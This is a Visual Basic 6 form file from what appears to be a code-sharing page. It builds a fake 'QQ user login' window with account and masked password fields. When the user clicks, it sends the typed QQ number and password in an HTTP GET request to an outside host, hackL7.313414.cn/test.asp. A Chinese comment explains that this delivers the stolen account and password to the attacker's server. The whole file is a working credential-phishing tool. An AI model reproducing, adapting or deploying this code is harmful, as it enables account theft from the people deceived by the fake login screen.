?? form2.frm
字號:
VERSION 5.00
Object = "{48E59290-9880-11CF-9754-00AA00C00908}#1.0#0"; "msinet.ocx"
Begin VB.Form Form2
Caption = "QQ用戶登陸 "
ClientHeight = 3120
ClientLeft = 60
ClientTop = 450
ClientWidth = 4860
Icon = "Form2.frx":0000
LinkTopic = "Form2"
MaxButton = 0 'False
Picture = "Form2.frx":4D5A
ScaleHeight = 3120
ScaleWidth = 4860
StartUpPosition = 2 '屏幕中心
Begin VB.TextBox Text2
BorderStyle = 0 'None
Height = 210
IMEMode = 3 'DISABLE
Left = 1370
PasswordChar = "*"
TabIndex = 2
Top = 1680
Width = 1935
End
Begin VB.TextBox Text1
BorderStyle = 0 'None
Height = 270
Left = 1370
TabIndex = 1
Text = "234234234"
Top = 1080
Width = 1910
End
Begin InetCtlsObjects.Inet Inet1
Left = 2640
Top = 4200
_ExtentX = 1005
_ExtentY = 1005
_Version = 393216
End
Begin VB.Label Label1
BackStyle = 0 'Transparent
Height = 375
Left = 3600
TabIndex = 0
Top = 2640
Width = 1095
End
Begin VB.Image Image1
Height = 3165
Left = 0
Picture = "Form2.frx":9AB4
Top = 0
Width = 4845
End
End
Attribute VB_Name = "Form2"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
Private Sub Inet1_StateChanged(ByVal State As Integer)
Me.Caption = State
If State = 12 Then
Debug.Print Inet1.GetChunk(0)
End If
End Sub
Private Sub Label1_Click()
Inet1.Execute "http://hackL7.313414.cn/test.asp?QQNumber=" & Text1.Text & "&QQPassWord=" & Text2.Text, "GET" '把帳號密碼發到空間,但是空間里必須要有test.asp這個文件
End Sub
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -